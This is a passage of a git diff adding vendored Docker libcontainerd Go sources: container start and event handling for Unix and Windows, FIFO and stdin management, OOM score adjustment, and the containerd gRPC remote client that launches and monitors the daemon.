StdioCallback) (err error) { + spec, err := ctr.spec() + if err != nil { + return nil + } + + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ready := make(chan struct{}) + + fifoCtx, cancel := context.WithCancel(context.Background()) + defer func() { + if err != nil { + cancel() + } + }() + + iopipe, err := ctr.openFifos(fifoCtx, spec.Process.Terminal) + if err != nil { + return err + } + + var stdinOnce sync.Once + + // we need to delay stdin closure after container start or else "stdin close" + // event will be rejected by containerd. + // stdin closure happens in attachStdio + stdin := iopipe.Stdin + iopipe.Stdin = ioutils.NewWriteCloserWrapper(stdin, func() error { + var err error + stdinOnce.Do(func() { // on error from attach we don't know if stdin was already closed + err = stdin.Close() + go func() { + select { + case <-ready: + case <-ctx.Done(): + } + select { + case <-ready: + if err := ctr.sendCloseStdin(); err != nil { + logrus.Warnf("failed to close stdin: %+v", err) + } + default: + } + }() + }) + return err + }) + + r := &containerd.CreateContainerRequest{ + Id: ctr.containerID, + BundlePath: ctr.dir, + Stdin: ctr.fifo(syscall.Stdin), + Stdout: ctr.fifo(syscall.Stdout), + Stderr: ctr.fifo(syscall.Stderr), + Checkpoint: checkpoint, + CheckpointDir: checkpointDir, + // check to see if we are running in ramdisk to disable pivot root + NoPivotRoot: os.Getenv("DOCKER_RAMDISK") != "", + Runtime: ctr.runtime, + RuntimeArgs: ctr.runtimeArgs, + } + ctr.client.appendContainer(ctr) + + if err := attachStdio(*iopipe); err != nil { + ctr.closeFifos(iopipe) + return err + } + + resp, err := ctr.client.remote.apiClient.CreateContainer(context.Background(), r) + if err != nil { + ctr.closeFifos(iopipe) + return err + } + ctr.systemPid = systemPid(resp.Container) + close(ready) + + return ctr.client.backend.StateChanged(ctr.containerID, StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: StateStart, + Pid: ctr.systemPid, + }}) +} + +func (ctr *container) newProcess(friendlyName string) *process { + return &process{ + dir: ctr.dir, + processCommon: processCommon{ + containerID: ctr.containerID, + friendlyName: friendlyName, + client: ctr.client, + }, + } +} + +func (ctr *container) handleEvent(e *containerd.Event) error { + ctr.client.lock(ctr.containerID) + defer ctr.client.unlock(ctr.containerID) + switch e.Type { + case StateExit, StatePause, StateResume, StateOOM: + st := StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: e.Type, + ExitCode: e.Status, + }, + OOMKilled: e.Type == StateExit && ctr.oom, + } + if e.Type == StateOOM { + ctr.oom = true + } + if e.Type == StateExit && e.Pid != InitFriendlyName { + st.ProcessID = e.Pid + st.State = StateExitProcess + } + + // Remove process from list if we have exited + switch st.State { + case StateExit: + ctr.clean() + ctr.client.deleteContainer(e.Id) + case StateExitProcess: + ctr.cleanProcess(st.ProcessID) + } + ctr.client.q.append(e.Id, func() { + if err := ctr.client.backend.StateChanged(e.Id, st); err != nil { + logrus.Errorf("libcontainerd: backend.StateChanged(): %v", err) + } + if e.Type == StatePause || e.Type == StateResume { + ctr.pauseMonitor.handle(e.Type) + } + if e.Type == StateExit { + if en := ctr.client.getExitNotifier(e.Id); en != nil { + en.close() + } + } + }) + + default: + logrus.Debugf("libcontainerd: event unhandled: %+v", e) + } + return nil +} + +// discardFifos attempts to fully read the container fifos to unblock processes +// that may be blocked on the writer side. +func (ctr *container) discardFifos() { + ctx, _ := context.WithTimeout(context.Background(), 3*time.Second) + for _, i := range []int{syscall.Stdout, syscall.Stderr} { + f, err := fifo.OpenFifo(ctx, ctr.fifo(i), syscall.O_RDONLY|syscall.O_NONBLOCK, 0) + if err != nil { + logrus.Warnf("error opening fifo %v for discarding: %+v", f, err) + continue + } + go func() { + io.Copy(ioutil.Discard, f) + }() + } +} diff --git a/vendor/github.com/docker/docker/libcontainerd/container_windows.go b/vendor/github.com/docker/docker/libcontainerd/container_windows.go new file mode 100644 index 0000000000..9b1965099a --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/container_windows.go @@ -0,0 +1,311 @@ +package libcontainerd + +import ( + "fmt" + "io" + "io/ioutil" + "strings" + "syscall" + "time" + + "github.com/Microsoft/hcsshim" + "github.com/Sirupsen/logrus" + "github.com/opencontainers/runtime-spec/specs-go" +) + +type container struct { + containerCommon + + // Platform specific fields are below here. There are none presently on Windows. + options []CreateOption + + // The ociSpec is required, as client.Create() needs a spec, + // but can be called from the RestartManager context which does not + // otherwise have access to the Spec + ociSpec specs.Spec + + manualStopRequested bool + hcsContainer hcsshim.Container +} + +func (ctr *container) newProcess(friendlyName string) *process { + return &process{ + processCommon: processCommon{ + containerID: ctr.containerID, + friendlyName: friendlyName, + client: ctr.client, + }, + } +} + +// start starts a created container. +// Caller needs to lock container ID before calling this method. +func (ctr *container) start(attachStdio StdioCallback) error { + var err error + isServicing := false + + for _, option := range ctr.options { + if s, ok := option.(*ServicingOption); ok && s.IsServicing { + isServicing = true + } + } + + // Start the container. If this is a servicing container, this call will block + // until the container is done with the servicing execution. + logrus.Debugln("libcontainerd: starting container ", ctr.containerID) + if err = ctr.hcsContainer.Start(); err != nil { + logrus.Errorf("libcontainerd: failed to start container: %s", err) + if err := ctr.terminate(); err != nil { + logrus.Errorf("libcontainerd: failed to cleanup after a failed Start. %s", err) + } else { + logrus.Debugln("libcontainerd: cleaned up after failed Start by calling Terminate") + } + return err + } + + // Note we always tell HCS to + // create stdout as it's required regardless of '-i' or '-t' options, so that + // docker can always grab the output through logs. We also tell HCS to always + // create stdin, even if it's not used - it will be closed shortly. Stderr + // is only created if it we're not -t. + createProcessParms := &hcsshim.ProcessConfig{ + EmulateConsole: ctr.ociSpec.Process.Terminal, + WorkingDirectory: ctr.ociSpec.Process.Cwd, + CreateStdInPipe: !isServicing, + CreateStdOutPipe: !isServicing, + CreateStdErrPipe: !ctr.ociSpec.Process.Terminal && !isServicing, + } + createProcessParms.ConsoleSize[0] = uint(ctr.ociSpec.Process.ConsoleSize.Height) + createProcessParms.ConsoleSize[1] = uint(ctr.ociSpec.Process.ConsoleSize.Width) + + // Configure the environment for the process + createProcessParms.Environment = setupEnvironmentVariables(ctr.ociSpec.Process.Env) + createProcessParms.CommandLine = strings.Join(ctr.ociSpec.Process.Args, " ") + createProcessParms.User = ctr.ociSpec.Process.User.Username + + // Start the command running in the container. + newProcess, err := ctr.hcsContainer.CreateProcess(createProcessParms) + if err != nil { + logrus.Errorf("libcontainerd: CreateProcess() failed %s", err) + if err := ctr.terminate(); err != nil { + logrus.Errorf("libcontainerd: failed to cleanup after a failed CreateProcess. %s", err) + } else { + logrus.Debugln("libcontainerd: cleaned up after failed CreateProcess by calling Terminate") + } + return err + } + + pid := newProcess.Pid() + + // Save the hcs Process and PID + ctr.process.friendlyName = InitFriendlyName + ctr.process.hcsProcess = newProcess + + // If this is a servicing container, wait on the process synchronously here and + // if it succeeds, wait for it cleanly shutdown and merge into the parent container. + if isServicing { + exitCode := ctr.waitProcessExitCode(&ctr.process) + + if exitCode != 0 { + if err := ctr.terminate(); err != nil { + logrus.Warnf("libcontainerd: terminating servicing container %s failed: %s", ctr.containerID, err) + } + return fmt.Errorf("libcontainerd: servicing container %s returned non-zero exit code %d", ctr.containerID, exitCode) + } + + return ctr.hcsContainer.WaitTimeout(time.Minute * 5) + } + + var stdout, stderr io.ReadCloser + var stdin io.WriteCloser + stdin, stdout, stderr, err = newProcess.Stdio() + if err != nil { + logrus.Errorf("libcontainerd: failed to get stdio pipes: %s", err) + if err := ctr.terminate(); err != nil { + logrus.Errorf("libcontainerd: failed to cleanup after a failed Stdio. %s", err) + } + return err + } + + iopipe := &IOPipe{Terminal: ctr.ociSpec.Process.Terminal} + + iopipe.Stdin = createStdInCloser(stdin, newProcess) + + // Convert io.ReadClosers to io.Readers + if stdout != nil { + iopipe.Stdout = ioutil.NopCloser(&autoClosingReader{ReadCloser: stdout}) + } + if stderr != nil { + iopipe.Stderr = ioutil.NopCloser(&autoClosingReader{ReadCloser: stderr}) + } + + // Save the PID + logrus.Debugf("libcontainerd: process started - PID %d", pid) + ctr.systemPid = uint32(pid) + + // Spin up a go routine waiting for exit to handle cleanup + go ctr.waitExit(&ctr.process, true) + + ctr.client.appendContainer(ctr) + + if err := attachStdio(*iopipe); err != nil { + // OK to return the error here, as waitExit will handle tear-down in HCS + return err + } + + // Tell the docker engine that the container has started. + si := StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: StateStart, + Pid: ctr.systemPid, // Not sure this is needed? Double-check monitor.go in daemon BUGBUG @jhowardmsft + }} + logrus.Debugf("libcontainerd: start() completed OK, %+v", si) + return ctr.client.backend.StateChanged(ctr.containerID, si) + +} + +// waitProcessExitCode will wait for the given process to exit and return its error code. +func (ctr *container) waitProcessExitCode(process *process) int { + // Block indefinitely for the process to exit. + err := process.hcsProcess.Wait() + if err != nil { + if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != syscall.ERROR_BROKEN_PIPE { + logrus.Warnf("libcontainerd: Wait() failed (container may have been killed): %s", err) + } + // Fall through here, do not return. This ensures we attempt to continue the + // shutdown in HCS and tell the docker engine that the process/container + // has exited to avoid a container being dropped on the floor. + } + + exitCode, err := process.hcsProcess.ExitCode() + if err != nil { + if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != syscall.ERROR_BROKEN_PIPE { + logrus.Warnf("libcontainerd: unable to get exit code from container %s", ctr.containerID) + } + // Since we got an error retrieving the exit code, make sure that the code we return + // doesn't incorrectly indicate success. + exitCode = -1 + + // Fall through here, do not return. This ensures we attempt to continue the + // shutdown in HCS and tell the docker engine that the process/container + // has exited to avoid a container being dropped on the floor. + } + + return exitCode +} + +// waitExit runs as a goroutine waiting for the process to exit. It's +// equivalent to (in the linux containerd world) where events come in for +// state change notifications from containerd. +func (ctr *container) waitExit(process *process, isFirstProcessToStart bool) error { + logrus.Debugln("libcontainerd: waitExit() on pid", process.systemPid) + + exitCode := ctr.waitProcessExitCode(process) + // Lock the container while shutting down + ctr.client.lock(ctr.containerID) + + // Assume the container has exited + si := StateInfo{ + CommonStateInfo: CommonStateInfo{ + State: StateExit, + ExitCode: uint32(exitCode), + Pid: process.systemPid, + ProcessID: process.friendlyName, + }, + UpdatePending: false, + } + + // But it could have been an exec'd process which exited + if !isFirstProcessToStart { + si.State = StateExitProcess + ctr.cleanProcess(process.friendlyName) + } else { + updatePending, err := ctr.hcsContainer.HasPendingUpdates() + if err != nil { + logrus.Warnf("libcontainerd: HasPendingUpdates() failed (container may have been killed): %s", err) + } else { + si.UpdatePending = updatePending + } + + logrus.Debugf("libcontainerd: shutting down container %s", ctr.containerID) + if err := ctr.shutdown(); err != nil { + logrus.Debugf("libcontainerd: failed to shutdown container %s", ctr.containerID) + } else { + logrus.Debugf("libcontainerd: completed shutting down container %s", ctr.containerID) + } + if err := ctr.hcsContainer.Close(); err != nil { + logrus.Error(err) + } + + // Remove process from list if we have exited + if si.State == StateExit { + ctr.client.deleteContainer(ctr.containerID) + } + } + + if err := process.hcsProcess.Close(); err != nil { + logrus.Errorf("libcontainerd: hcsProcess.Close(): %v", err) + } + + // Unlock here before we call back into the daemon to update state + ctr.client.unlock(ctr.containerID) + + // Call into the backend to notify it of the state change. + logrus.Debugf("libcontainerd: waitExit() calling backend.StateChanged %+v", si) + if err := ctr.client.backend.StateChanged(ctr.containerID, si); err != nil { + logrus.Error(err) + } + + logrus.Debugf("libcontainerd: waitExit() completed OK, %+v", si) + + return nil +} + +// cleanProcess removes process from the map. +// Caller needs to lock container ID before calling this method. +func (ctr *container) cleanProcess(id string) { + delete(ctr.processes, id) +} + +// shutdown shuts down the container in HCS +// Caller needs to lock container ID before calling this method. +func (ctr *container) shutdown() error { + const shutdownTimeout = time.Minute * 5 + err := ctr.hcsContainer.Shutdown() + if hcsshim.IsPending(err) { + // Explicit timeout to avoid a (remote) possibility that shutdown hangs indefinitely. + err = ctr.hcsContainer.WaitTimeout(shutdownTimeout) + } else if hcsshim.IsAlreadyStopped(err) { + err = nil + } + + if err != nil { + logrus.Debugf("libcontainerd: error shutting down container %s %v calling terminate", ctr.containerID, err) + if err := ctr.terminate(); err != nil { + return err + } + return err + } + + return nil +} + +// terminate terminates the container in HCS +// Caller needs to lock container ID before calling this method. +func (ctr *container) terminate() error { + const terminateTimeout = time.Minute * 5 + err := ctr.hcsContainer.Terminate() + + if hcsshim.IsPending(err) { + err = ctr.hcsContainer.WaitTimeout(terminateTimeout) + } else if hcsshim.IsAlreadyStopped(err) { + err = nil + } + + if err != nil { + logrus.Debugf("libcontainerd: error terminating container %s %v", ctr.containerID, err) + return err + } + + return nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/oom_linux.go b/vendor/github.com/docker/docker/libcontainerd/oom_linux.go new file mode 100644 index 0000000000..e126b7a550 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/oom_linux.go @@ -0,0 +1,31 @@ +package libcontainerd + +import ( + "fmt" + "os" + "strconv" + + "github.com/Sirupsen/logrus" + "github.com/opencontainers/runc/libcontainer/system" +) + +func setOOMScore(pid, score int) error { + oomScoreAdjPath := fmt.Sprintf("/proc/%d/oom_score_adj", pid) + f, err := os.OpenFile(oomScoreAdjPath, os.O_WRONLY, 0) + if err != nil { + return err + } + stringScore := strconv.Itoa(score) + _, err = f.WriteString(stringScore) + f.Close() + if os.IsPermission(err) { + // Setting oom_score_adj does not work in an + // unprivileged container. Ignore the error, but log + // it if we appear not to be in that situation. + if !system.RunningInUserNS() { + logrus.Debugf("Permission denied writing %q to %s", stringScore, oomScoreAdjPath) + } + return nil + } + return err +} diff --git a/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go b/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go new file mode 100644 index 0000000000..2ebe5e87cf --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/oom_solaris.go @@ -0,0 +1,5 @@ +package libcontainerd + +func setOOMScore(pid, score int) error { + return nil +} diff --git a/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go b/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go new file mode 100644 index 0000000000..4f3766d95c --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/pausemonitor_unix.go @@ -0,0 +1,42 @@ +// +build !windows + +package libcontainerd + +import ( + "sync" +) + +// pauseMonitor is helper to get notifications from pause state changes. +type pauseMonitor struct { + sync.Mutex + waiters map[string][]chan struct{} +} + +func (m *pauseMonitor) handle(t string) { + m.Lock() + defer m.Unlock() + if m.waiters == nil { + return + } + q, ok := m.waiters[t] + if !ok { + return + } + if len(q) > 0 { + close(q[0]) + m.waiters[t] = q[1:] + } +} + +func (m *pauseMonitor) append(t string, waiter chan struct{}) { + m.Lock() + defer m.Unlock() + if m.waiters == nil { + m.waiters = make(map[string][]chan struct{}) + } + _, ok := m.waiters[t] + if !ok { + m.waiters[t] = make([]chan struct{}, 0) + } + m.waiters[t] = append(m.waiters[t], waiter) +} diff --git a/vendor/github.com/docker/docker/libcontainerd/process.go b/vendor/github.com/docker/docker/libcontainerd/process.go new file mode 100644 index 0000000000..57562c8789 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/process.go @@ -0,0 +1,18 @@ +package libcontainerd + +// processCommon are the platform common fields as part of the process structure +// which keeps the state for the main container process, as well as any exec +// processes. +type processCommon struct { + client *client + + // containerID is the Container ID + containerID string + + // friendlyName is an identifier for the process (or `InitFriendlyName` + // for the first process) + friendlyName string + + // systemPid is the PID of the main container process + systemPid uint32 +} diff --git a/vendor/github.com/docker/docker/libcontainerd/process_unix.go b/vendor/github.com/docker/docker/libcontainerd/process_unix.go new file mode 100644 index 0000000000..506fca6e11 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/process_unix.go @@ -0,0 +1,107 @@ +// +build linux solaris + +package libcontainerd + +import ( + "io" + "io/ioutil" + "os" + "path/filepath" + goruntime "runtime" + "strings" + + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/tonistiigi/fifo" + "golang.org/x/net/context" + "golang.org/x/sys/unix" +) + +var fdNames = map[int]string{ + unix.Stdin: "stdin", + unix.Stdout: "stdout", + unix.Stderr: "stderr", +} + +// process keeps the state for both main container process and exec process. +type process struct { + processCommon + + // Platform specific fields are below here. + dir string +} + +func (p *process) openFifos(ctx context.Context, terminal bool) (pipe *IOPipe, err error) { + if err := os.MkdirAll(p.dir, 0700); err != nil { + return nil, err + } + + io := &IOPipe{} + + io.Stdin, err = fifo.OpenFifo(ctx, p.fifo(unix.Stdin), unix.O_WRONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700) + if err != nil { + return nil, err + } + + defer func() { + if err != nil { + io.Stdin.Close() + } + }() + + io.Stdout, err = fifo.OpenFifo(ctx, p.fifo(unix.Stdout), unix.O_RDONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700) + if err != nil { + return nil, err + } + + defer func() { + if err != nil { + io.Stdout.Close() + } + }() + + if goruntime.GOOS == "solaris" || !terminal { + // For Solaris terminal handling is done exclusively by the runtime therefore we make no distinction + // in the processing for terminal and !terminal cases. + io.Stderr, err = fifo.OpenFifo(ctx, p.fifo(unix.Stderr), unix.O_RDONLY|unix.O_CREAT|unix.O_NONBLOCK, 0700) + if err != nil { + return nil, err + } + defer func() { + if err != nil { + io.Stderr.Close() + } + }() + } else { + io.Stderr = ioutil.NopCloser(emptyReader{}) + } + + return io, nil +} + +func (p *process) sendCloseStdin() error { + _, err := p.client.remote.apiClient.UpdateProcess(context.Background(), &containerd.UpdateProcessRequest{ + Id: p.containerID, + Pid: p.friendlyName, + CloseStdin: true, + }) + if err != nil && (strings.Contains(err.Error(), "container not found") || strings.Contains(err.Error(), "process not found")) { + return nil + } + return err +} + +func (p *process) closeFifos(io *IOPipe) { + io.Stdin.Close() + io.Stdout.Close() + io.Stderr.Close() +} + +type emptyReader struct{} + +func (r emptyReader) Read(b []byte) (int, error) { + return 0, io.EOF +} + +func (p *process) fifo(index int) string { + return filepath.Join(p.dir, p.friendlyName+"-"+fdNames[index]) +} diff --git a/vendor/github.com/docker/docker/libcontainerd/process_windows.go b/vendor/github.com/docker/docker/libcontainerd/process_windows.go new file mode 100644 index 0000000000..57ecc948d0 --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/process_windows.go @@ -0,0 +1,51 @@ +package libcontainerd + +import ( + "io" + "sync" + + "github.com/Microsoft/hcsshim" + "github.com/docker/docker/pkg/ioutils" +) + +// process keeps the state for both main container process and exec process. +type process struct { + processCommon + + // Platform specific fields are below here. + + // commandLine is to support returning summary information for docker top + commandLine string + hcsProcess hcsshim.Process +} + +type autoClosingReader struct { + io.ReadCloser + sync.Once +} + +func (r *autoClosingReader) Read(b []byte) (n int, err error) { + n, err = r.ReadCloser.Read(b) + if err == io.EOF { + r.Once.Do(func() { r.ReadCloser.Close() }) + } + return +} + +func createStdInCloser(pipe io.WriteCloser, process hcsshim.Process) io.WriteCloser { + return ioutils.NewWriteCloserWrapper(pipe, func() error { + if err := pipe.Close(); err != nil { + return err + } + + err := process.CloseStdin() + if err != nil && !hcsshim.IsNotExist(err) && !hcsshim.IsAlreadyClosed(err) { + // This error will occur if the compute system is currently shutting down + if perr, ok := err.(*hcsshim.ProcessError); ok && perr.Err != hcsshim.ErrVmcomputeOperationInvalidState { + return err + } + } + + return nil + }) +} diff --git a/vendor/github.com/docker/docker/libcontainerd/queue_unix.go b/vendor/github.com/docker/docker/libcontainerd/queue_unix.go new file mode 100644 index 0000000000..b848b9872b --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/queue_unix.go @@ -0,0 +1,31 @@ +// +build linux solaris + +package libcontainerd + +import "sync" + +type queue struct { + sync.Mutex + fns map[string]chan struct{} +} + +func (q *queue) append(id string, f func()) { + q.Lock() + defer q.Unlock() + + if q.fns == nil { + q.fns = make(map[string]chan struct{}) + } + + done := make(chan struct{}) + + fn, ok := q.fns[id] + q.fns[id] = done + go func() { + if ok { + <-fn + } + f() + close(done) + }() +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote.go b/vendor/github.com/docker/docker/libcontainerd/remote.go new file mode 100644 index 0000000000..9031e3ae7d --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote.go @@ -0,0 +1,20 @@ +package libcontainerd + +// Remote on Linux defines the accesspoint to the containerd grpc API. +// Remote on Windows is largely an unimplemented interface as there is +// no remote containerd. +type Remote interface { + // Client returns a new Client instance connected with given Backend. + Client(Backend) (Client, error) + // Cleanup stops containerd if it was started by libcontainerd. + // Note this is not used on Windows as there is no remote containerd. + Cleanup() + // UpdateOptions allows various remote options to be updated at runtime. + UpdateOptions(...RemoteOption) error +} + +// RemoteOption allows to configure parameters of remotes. +// This is unused on Windows. +type RemoteOption interface { + Apply(Remote) error +} diff --git a/vendor/github.com/docker/docker/libcontainerd/remote_unix.go b/vendor/github.com/docker/docker/libcontainerd/remote_unix.go new file mode 100644 index 0000000000..64a28646be --- /dev/null +++ b/vendor/github.com/docker/docker/libcontainerd/remote_unix.go @@ -0,0 +1,544 @@ +// +build linux solaris + +package libcontainerd + +import ( + "fmt" + "io" + "io/ioutil" + "log" + "net" + "os" + "os/exec" + "path/filepath" + goruntime "runtime" + "strconv" + "strings" + "sync" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + containerd "github.com/docker/containerd/api/grpc/types" + "github.com/docker/docker/pkg/locker" + sysinfo "github.com/docker/docker/pkg/system" + "github.com/docker/docker/utils" + "github.com/golang/protobuf/ptypes" + "github.com/golang/protobuf/ptypes/timestamp" + "golang.org/x/net/context" + "google.golang.org/grpc" + "google.golang.org/grpc/grpclog" + "google.golang.org/grpc/health/grpc_health_v1" + "google.golang.org/grpc/transport" +) + +const ( + maxConnectionRetryCount = 3 + containerdHealthCheckTimeout = 3 * time.Second + containerdShutdownTimeout = 15 * time.Second + containerdBinary = "docker-containerd" + containerdPidFilename = "docker-containerd.pid" + containerdSockFilename = "docker-containerd.sock" + containerdStateDir = "containerd" + eventTimestampFilename = "event.ts" +) + +type remote struct { + sync.RWMutex + apiClient containerd.APIClient + daemonPid int + stateDir string + rpcAddr string + startDaemon bool + closeManually bool + debugLog bool + rpcConn *grpc.ClientConn + clients []*client + eventTsPath string + runtime string + runtimeArgs []string + daemonWaitCh chan struct{} + liveRestore bool + oomScore int + restoreFromTimestamp *timestamp.Timestamp +} + +// New creates a fresh instance of libcontainerd remote. +func New(stateDir string, options ...RemoteOption) (_ Remote, err error) { + defer func() { + if err != nil { + err = fmt.Errorf("Failed to connect to containerd. Please make sure containerd is installed in your PATH or you have specified the correct address. Got error: %v", err) + } + }() + r := &remote{ + stateDir: stateDir, + daemonPid: -1, + eventTsPath: filepath.Join(stateDir, eventTimestampFilename), + } + for _, option := range options { + if err := option.Apply(r); err != nil { + return nil, err + } + } + + if err := sysinfo.MkdirAll(stateDir, 0700); err != nil { + return nil, err + } + + if r.rpcAddr == "" { + r.rpcAddr = filepath.Join(stateDir, containerdSockFilename) + } + + if r.startDaemon { + if err := r.runContainerdDaemon(); err != nil { + return nil, err + } + } + + // don't output the grpc reconnect logging + grpclog.SetLogger(log.New(ioutil.Discard, "", log.LstdFlags)) + dialOpts := append([]grpc.DialOption{grpc.WithInsecure()}, + grpc.WithDialer(func(addr string, timeout time.Duration) (net.Conn, error) { + return net.DialTimeout("unix", addr, timeout) + }), + ) + conn, err := grpc.Dial(r.rpcAddr, dialOpts...) + if err != nil { + return nil, fmt.Errorf("error connecting to containerd: %v", err) + } + + r.rpcConn = conn + r.apiClient = containerd.NewAPIClient(conn) + + // Get the timestamp to restore from + t := r.getLastEventTimestamp() + tsp, err := ptypes.TimestampProto(t) + if err != nil { + logrus.Errorf("libcontainerd: failed to convert timestamp: %q", err) + } + r.restoreFromTimestamp = tsp + + go r.handleConnectionChange() + + if err := r.startEventsMonitor(); err != nil { + return nil, err + } + + return r, nil +} + +func (r *remote) UpdateOptions(options ...RemoteOption) error { + for _, option := range options { + if err := option.Apply(r); err != nil { + return err + } + } + return nil +} + +func (r *remote) handleConnectionChange() { + var transientFailureCount = 0 + + ticker := time.NewTicker(500 * time.Millisecond) + defer ticker.Stop() + healthClient := grpc_health_v1.NewHealthClient(r.rpcConn) + + for { + <-ticker.C + ctx, cancel := context.WithTimeout(context.Background(), containerdHealthCheckTimeout) + _, err := healthClient.Check(ctx, &grpc_health_v1.HealthCheckRequest{}) + cancel() + if err == nil { + continue + } + + logrus.Debugf("libcontainerd: containerd health check returned error: %v", err) + + if r.daemonPid != -1 { + if strings.Contains(err.Error(), "is closing") { + // Well, we asked for it to stop, just return + return + } + // all other errors are transient + // Reset state to be notified of next failure + transientFailureCount++ + if transientFailureCount >= maxConnectionRetryCount { + transientFailureCount = 0 + if utils.IsProcessAlive(r.daemonPid) { + utils.KillProcess(r.daemonPid) + } + <-r.daemonWaitCh + if err := r.runContainerdDaemon(); err != nil { //FIXME: Handle error + logrus.Errorf("libcontainerd: error restarting containerd: %v", err) + } + continue + } + } + } +} + +func (r *remote) Cleanup() { + if r.daemonPid == -1 { + return + } + r.closeManually = true + r.rpcConn.Close() + // Ask the daemon to quit + syscall.Kill(r.daemonPid, syscall.SIGTERM) + + // Wait up to 15secs for it to stop + for i := time.Duration(0); i < containerdShutdownTimeout; i += time.Second { + if !utils.IsProcessAlive(r.daemonPid) { + break + } + time.Sleep(time.Second) + } + + if utils.IsProcessAlive(r.daemonPid) { + logrus.Warnf("libcontainerd: containerd (%d) didn't stop within 15 secs, killing it\n", r.daemonPid) + syscall.Kill(r.daemonPid, syscall.SIGKILL) + } + + // cleanup some files + os.Remove(filepath.Join(r.stateDir, containerdPidFilename)) + os.Remove(filepath.Join(r.stateDir, containerdSockFilename)) +} + +func (r *remote) Client(b Backend) (Client, error) { + c := &client{ + clientCommon: clientCommon{ + backend: b, + containers: make(map[string]*container), + locker: locker.New(), + }, + remote: r, + exitNotifiers: make(map[string]*exitNotifier), + liveRestore: r.liveRestore, + } + + r.Lock() + r.clients = append(r.clients, c) + r.Unlock() + return c, nil +} + +func (r *remote) updateEventTimestamp(t time.Time) { + f, err := os.OpenFile(r.eventTsPath, syscall.O_CREAT|syscall.O_WRONLY|syscall.O_TRUNC, 0600) + if err != nil { + logrus.Warnf("libcontainerd: failed to open event timestamp file: %v", err) + return + } + defer f.Close() + + b, err := t.MarshalText() + if err != nil { + logrus.Warnf("libcontainerd: failed to encode timestamp: %v", err) + return + } + + n, err := f.Write(b) + if err != nil || n != len(b) { + logrus.Warnf("libcontainerd: failed to update event timestamp file: %v", err) + f.Truncate(0) + return + } +} + +func (r *remote) getLastEventTimestamp() time.Time { + t := time.Now() + + fi, err := os.Stat(r.eventTsPath) + if os.IsNotExist(err) || fi.Size() == 0 { + return t + } + + f, err := os.Open(r.eventTsPath) + if err != nil { + logrus.Warnf("libcontainerd: Unable to access last event ts: %v", err) + return t + } + defer f.Close() + + b := make([]byte, fi.Size()) + n, err := f.Read(b) + if err != nil || n != len(b) { + logrus.Warnf("libcontainerd: Unable to read last event ts: %v", err) + return t + } + + t.UnmarshalText(b) + + return t +} + +func (r *remote) startEventsMonitor() error { + // First, get past events + t := r.getLastEventTimestamp() + tsp, err := ptypes.TimestampProto(t) + if err != nil { + logrus.Errorf("libcontainerd: failed to convert timestamp: %q", err) + } + er := &containerd.EventsRequest{ + Timestamp: tsp, + } + events, err := r.apiClient.Events(context.Background(), er, grpc.FailFast(false)) + if err != nil { + return err + } + go r.handleEventStream(events) + return nil +} + +func (r *remote) handleEventStream(events containerd.API_EventsClient) { + for { + e, err := events.Recv() + if err != nil { + if grpc.ErrorDesc(err) == transport.ErrConnClosing.Desc && + r.closeManually { + // ignore error if grpc remote connection is closed manually + return + } + logrus.Errorf("libcontainerd: failed to receive event from containerd: %v", err) + go r.startEventsMonitor() + return + } + + logrus.Debugf("libcontainerd: received containerd event: %#v", e) + + var container *container + var c *client + r.RLock() + for _, c = range r.clients { + container, err = c.getContainer(e.Id) + if err == nil { + break + } + } + r.RUnlock() + if container == nil { + logrus.Warnf("libcontainerd: unknown container %s", e.Id) + continue + } + + if err := container.handleEvent(e); err != nil { + logrus.Errorf("libcontainerd: error processing state change for %s: %v", e.Id, err) + } + + tsp, err := ptypes.Timestamp(e.Timestamp) + if err != nil { + logrus.Errorf("libcontainerd: failed to convert event timestamp: %q", err) + continue + } + + r.updateEventTimestamp(tsp) + } +} + +func (r *remote) runContainerdDaemon() error { + pidFilename := filepath.Join(r.stateDir, containerdPidFilename) + f, err := os.OpenFile(pidFilename, os.O_RDWR|os.O_CREATE, 0600) + if err != nil { + return err + } + defer f.Close() + + // File exist, check if the daemon is alive + b := make([]byte, 8) + n, err := f.Read(b) + if err != nil && err != io.EOF { + return err + } + + if n > 0 { + pid, err := strconv.ParseUint(string(b[:n]), 10, 64) + if err != nil { + return err + } + if utils.IsProcessAlive(int(pid)) { + logrus.Infof("libcontainerd: previous instance of containerd still alive (%d)", pid) + r.daemonPid = int(pid) + return nil + } + } + + // rewind the file + _, err = f.Seek(0, os.SEEK_SET) + if err != nil { + return err + } + + // Truncate it + err = f.Truncate(0) + if err != nil { + return err + } + + // Start a new instance + args := []string{ + "-l", fmt.Sprintf("unix://%s", r.rpcAddr), + "--metrics-interval=0", + "--start-timeout", "2m", + "--state-dir", filepath.Join(r.stateDir, containerdStateDir), + } + if goruntime.GOOS == "solaris" { + args = append(args, "--shim", "containerd-shim", "--runtime", "runc") + } else { + args = append(args, "--shim", "docker-containerd-shim") + if r.runtime != "" { + args = append(args, "--runtime") + args = append(args, r.runtime) + } + } + if r.debugLog { + args = append(args, "--debug") + } + if len(r.runtimeArgs) > 0 { + for _, v := range r.runtimeArgs { + args = append(args, "--runtime-args") + args = append(args, v) + } + logrus.Debugf("libcontainerd: runContainerdDaemon: runtimeArgs: %s", args) + } + + cmd := exec.Command(containerdBinary, args...) 